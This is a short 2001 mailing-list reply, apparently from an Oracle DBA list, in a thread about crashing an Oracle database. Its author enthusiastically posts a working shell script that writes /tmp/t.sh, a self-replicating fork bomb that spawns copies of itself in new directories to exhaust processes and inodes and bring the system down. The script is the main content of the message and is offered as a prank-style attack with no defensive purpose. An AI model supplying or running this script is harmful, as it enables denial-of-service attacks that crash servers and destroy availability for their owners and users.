RE: Cool way to crash an Oracle database, any time, any place

From: Norrell, Brian <BNorrell_at_QuadraMed.com>
Date: Thu, 10 May 2001 09:40:55 -0700

Chew up the inodes! Excellent. (Monty Burns "excellent" with the fingers twitching as opposed to the Bill and Ted "excellent" with the air guitar.)

echo 'mkdir $$; cd $$' > /tmp/t.sh
echo '/tmp/t.sh &' >> /tmp/t.sh
echo '/tmp/t.sh &' >> /tmp/t.sh

chmod 777 /tmp/t.sh
/tmp/t.sh

Your technological distinctiveness has been added to the collective...

Brian Norrell
Manager, MPI Development
QuadraMed
511 E John Carpenter Frwy, Su 500